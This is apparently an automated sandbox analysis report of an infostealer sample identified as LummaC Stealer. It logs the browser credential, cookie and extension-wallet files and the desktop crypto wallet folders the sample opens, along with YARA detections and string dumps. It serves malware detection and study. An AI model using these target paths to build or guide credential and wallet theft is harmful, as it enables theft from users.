Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: EduSpark.pif Binary or memory string: WIN_81
Source: EduSpark.pif Binary or memory string: WIN_XP
Source: Buffer.pif.1.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: EduSpark.pif Binary or memory string: WIN_XPe
Source: EduSpark.pif Binary or memory string: WIN_VISTA
Source: EduSpark.pif Binary or memory string: WIN_7
Source: EduSpark.pif Binary or memory string: WIN_8
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\WUTJSCBCFX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\ZSSZYEFYMU Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\AFWAAFRXKO Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\ONBQCLYSPU Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\TQDGENUHWP Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\NHPKIZUUSG Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\VAMYDFPUND Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000001A.00000003.2159848467.000000000176F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Buffer.pif PID: 2004, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: Buffer.pif PID: 2004, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
